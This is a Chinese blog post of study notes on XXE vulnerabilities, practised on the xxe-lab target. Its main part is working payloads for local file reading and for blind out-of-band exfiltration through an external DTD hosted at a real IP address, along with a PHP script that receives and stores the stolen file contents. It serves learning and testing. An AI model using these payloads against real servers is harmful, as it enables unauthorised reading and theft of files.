Xxe漏洞

最新推荐文章于 2024-08-16 23:47:01 发布
最新推荐文章于 2024-08-16 23:47:01 发布
阅读量382 收藏 6
点赞数 5
文章标签: 学习 笔记 安全 xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80280669/article/details/137086603
版权

Xxe漏洞

一,Xml:是一种用来传输存储数据的语言,与html语法相似。但xml标签没有预定义,必须使用者来进行定义;同时,xml用于传输存储数据,被设计为具有自我描述性。而html用以显示数据,焦点是数据的外观(现在xml传输方式使用较少,大部分为json或其他类型的传参方式)。

二,       漏洞介绍

1, 本质

xml 是用来传输数据,那若在传输的数据里面写的是恶意数据,传到后端被解析了,执行了命令,从而实现危害利用(传输恶意xml语句)。

2, 分类

有无回显。

3, 靶场:xxe-lab(使用phpstudy时,仅解压后缀名为.php的压缩包到www文件夹下)。

三,       漏洞使用

抓包,看是否为xml传参方式

若是,可以考虑在这个传输恶意数据,因为登录口传输的是 xml ,那么后端接收的时候,肯定是 xml 解析,既能会解析,那么我们就传恶意的 xml 数据给它解析,让他执行。

1, 有回显

读取文件

<?xml version="1.0"?>

<!DOCTYPE xxxxx [

<!ENTITY test SYSTEM "file:///d:/1.txt">

]>

<user><username>&test;</username><password>123456</password></user>

解 释 : 将 "file:///d:/1.txt" 赋 值 给 变 量 test , 然 后 服 务 器 在 检 查 username 时 就 会 解 析

"file:///d:/1.txt" 在黑盒测试中,我们可以抓个包看看,提交的数据是不是 xml 的这种树状的格式,或者看看content-type 是不是 xml 类型

2、外部引用实体 dtd_x0005_:

<?xml version="1.0" ?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "http://111.229.218.169/1.dtd">

%file;

]>

<user><username>&send;</username><password>123456</password></user>

1.dtd 中写着

<!ENTITY send SYSTEM "file:///d:/1.txt">

对于上段代码的解释:有一个实体声明(ENTITY declaretion):%file。实体声明定义了一个名为%file

的实体,该实体的值是从 https://111.229.218.169/1.dtd 获取的内容,在 username 元素中,使用了

一个实体引用“&send”来表示实体的值,实体&send 中解析 1.dtd 文件中,得到&send 最后值为执行

file:///d:/1.txt

2、无回显

发现能带外了,说明执行了,再去利用

<?xml version="1.0"?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "http://72y3s1.dnslog.cn">

%file;

]>

<user><username>&send;</username><password>123456</password></user>

读取文件

<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM "file:///d:/1.txt">

<!ENTITY % remote SYSTEM "http://111.229.218.169/2.dtd">

%remote;

%all;

]>

<root>&send;</root>

2.dtd

<!ENTITY % all "<!ENTITY send SYSTEM 'http://111.229.218.169/get.php?file=%file;'>" >

get.php 中

<?php

$data=$_GET['file'];

$myfile=fopen("file.txt","w+");

fwrite($myfile,$data);

fclose($myfile);

?>

影市
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的...开发人员应采取适当的安全措施,确保XML解析过程安全,以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作。
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
VTK-vtkStructuredGrid学习
weixin_69505365的博客
08-14 357
可以理解为单元格顺序沿着坐标轴排列,但是每个单元格可以不一样。维度理解为X/Y/Z方向的点数,如草图所示分别是4,3,1。此时只提供了12个点,只能构造一层,5.点图、线图、面图如下,对应行的代码改一下出现不同效果图。7.增加Z方向维度,点也要增加,点序保持一致。6.点可以不在同一个平面,随机改变点Z数值。2.获取这些点信息,点顺序要严格按照图示。直接赋值第一层的12个点,改一下Z值。所以Z方向维度是1,不能是其他数据。1.使用CAD随意绘制个网格草图。4.将上面的网格显示出来。
fme处理空间数据入门v0
weixin_43229258的博客
08-13 727
本教程是最最最基本的fme处理空间数据内容,给新同事介绍我以前是怎么干活用的,基本啥有用的东西。本教程主要说如何在 FME Workbench中创建模板文件(一般我们把fme写的工作空间就叫模板),教程里面主要是利用GIS数据。按照分步说明操作,1.了解如何从读取数据;2.添加转换器以在空间上过滤数据;3.将过滤后的数据写入 Esri Shapefile;4.如何运行模板文件。
【Python】python中抽象类学习笔记
qq_42761751的博客
08-12 412
抽象类是一个不能被实例化的类,通常作为其他类的基类抽象方法是一个没有具体实现的方法一个抽象类可以有或者没有抽象方法, 但是一般来说定义抽象类的时候总会在类中定义抽象方法Python并没有直接支持抽象类,但是提供了一个模块(abc)来允许定义抽象类通过继承abc.ABC类定义一个抽象类pass上述代码中类虽然继承了ABC但是没有定义抽象方法,仍然可以被实例化。"""使用@abstractmethod来定义抽象方法"""passmain()代码报错:不能实例化一个带有抽象方法的抽象类。
CVPR2024 | PromptAD: 仅使用正常样本进行小样本异常检测的学习提示
08-16 597
本文提出的PromptAD模型结构如图2所示。PromptAD建立在VV-CLIP之上,其视觉编码器用于提取全局和局部的特征。本文提出的语义串联(SC)用来设计提示。具体来说,将N个可学习的普通前缀与目标名称串联起来获得普通提示(NPs),然后将这N个普通提示分别与M个手动设置的异常后缀和L个可学习的异常后缀串联,以获得N×M个异常提示(MAPs)和N×L个可学习的异常提示(LAPs)。视觉特征和提示特征用于通过对比损失和本文提出的显式异常边界(EMA)损失来完成提示学习
如何学习Kubernetes?
CloudJourney的博客
08-13 656
在云计算和容器化技术日新月异的今天,Kubernetes(简称K8s)作为容器编排领域的领头羊,已经成为现代应用部署和管理的标准工具。本文旨在为有志于学习Kubernetes的读者提供一条清晰的学习路径,从基础概念到高级特性,再到实战应用,帮助大家逐步掌握这门强大的技术。通过本文提供的学习路径和实战建议,希望能够帮助你逐步掌握这门强大的技术,并在实际项目中灵活应用。同时,Kubernetes还提供了强大的社区支持和丰富的生态系统,使得开发者可以轻松地找到适合自己的解决方案。
如何高效记录并整理编程学习笔记
vvvae1234的博客
08-13 1244
在编程学习的旅程中,好的笔记记录和整理方法不仅能帮助我们更有效地吸收知识,还能在复习时提供清晰的参考。下面,我将为您提供一些建立高效笔记系统的建议,以帮助您在繁忙学习中保持笔记的条理性,从而打造属于自己的编程学习“知识宝库”。方向一:笔记工具选择方向二:笔记结构设计方向三:实践与复习策略
如何高效记录并整理编程学习笔记
最新发布
探索IT世界
08-16 464
建立一个高效的编程学习笔记系统是一个持续的过程。选择合适的工具,设计清晰的笔记结构,并结合实践与复习,可以帮助我们更好地掌握编程知识。记住,笔记的价值在于其使用,不断优化你的笔记系统,让它成为你学习路上的得力助手。希望这篇博客能够为你在IT行业的职业发展提供一些启发和指导。如果你有任何问题或需要进一步的建议,欢迎在评论区留言交流。让我们一起探索IT世界的无限可能!《IT入门知识大纲(0/10)》《IT入门知识第一部分《IT基础知识》(1/10)》《IT入门知识第二部分《编程语言》(2/10)》
零基础学习Redis(1) -- Redis简介
2303_78892316的博客
08-13 530
Redis是一个在存储数据的一个中间组件,可用作数据库或数据缓存,通常在分布式系统中使用(
EmguCV学习笔记 VB.Net 2.2 Matrix类
UruseiBest 的技术专栏
08-15 658
Matrix类是EmguCV中的一个矩阵类,它可以用来存储和处理矩阵数据,可以处理任意维度的矩阵。与Mat类相比,Matrix类提供了更多的矩阵运算方法,如矩阵加减、乘法、逆矩阵等,也更加灵活,而且底层实现也更加高效。例如,当均值为0,标准差为1时,生成的随机矩阵的像素值符合标准正态分布。当均值为0,标准差为0.5时,生成的随机矩阵的像素值分布更加集中,更接近于均值。该控件位于【工具箱】|【Emgu.CV】下面。SetRandNormal方法只能生成正态分布的随机矩阵,不能生成其他分布的随机矩阵。
详细学习PyQt5的样式表与界面美化
weixin_49520696的博客
08-13 1079
在实战练习和学习的过程中,记得总结和反思自己的样式表编写经验。养成良好的命名习惯,使用有意义的选择器名称和注释,提高样式表的可读性。将常用的样式提取为通用样式类,促进样式的重用和一致性。合理使用继承和层叠,避免不必要的样式重复和冲突。注意样式表的性能影响,避免过于复杂的选择器和过多的样式规则。定期重构和优化样式表,保持样式表的整洁和可维护性。与团队成员分享和交流样式表的最佳实践,促进知识共享和代码质量提升。/* 通用样式 */QWidget {/* 按钮样式 */
【Qt】QPluginLoader 类学习
油炸自行车的博客
08-13 735
QPluginLoader类在运行时加载插件。提供对Qt插件的访问。Qt插件存储在共享库(如 DLL 文件)中,相比于QLibrary访问的共享库,会检查插件是否与应用程序使用的Qt版本一致;提供对根组件对象 (instance())的直接访问,而无需动手解析C函数。对象的实例操作单个共享库文件,这个共享库文件被称为插件。它以独立于平台的方式提供对插件中功能的访问。要指定要加载的插件,请在构造函数中传递文件名,或者使用方法进行设置。使用类一旦加载成功,插件会保留在内存中,直到所有实例都被卸载
算法的学习笔记—链表中倒数第 K 个结点(牛客JZ22)
业精于勤,荒于嬉
08-16 666
通过使用双指针技术,我们能够高效地找到链表中的倒数第 K 个节点。这种方法不仅简单明了,而且在大多数情况下都能提供良好的性能表现。在处理链表相关问题时,双指针技术是一个非常有用的工具。希望本文的讲解能帮助你更好地理解和解决类似的链表问题。😁热门专栏推荐想学习vue的可以看看这个java基础合集数据库合集redis合集nginx合集linux合集手写机制微服务组件spring_尘觉springMVCmybits🤔欢迎大家加入我的社区尘觉社区。
【Python学习-UI界面】PyQt5 小部件6- QComboBox
邑轻辰的学习笔记
08-14 170
一个 QComboBox 对象呈现一个下拉列表供选择。它在表单上占用的屏幕空间最小,仅显示当前选定项。可以将组合框设置为可编辑;还可以存储像素映射对象。
【机器学习西瓜书学习笔记——概率图模型】
m0_51148715的博客
08-15 616
MRFCRFMCMC。
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值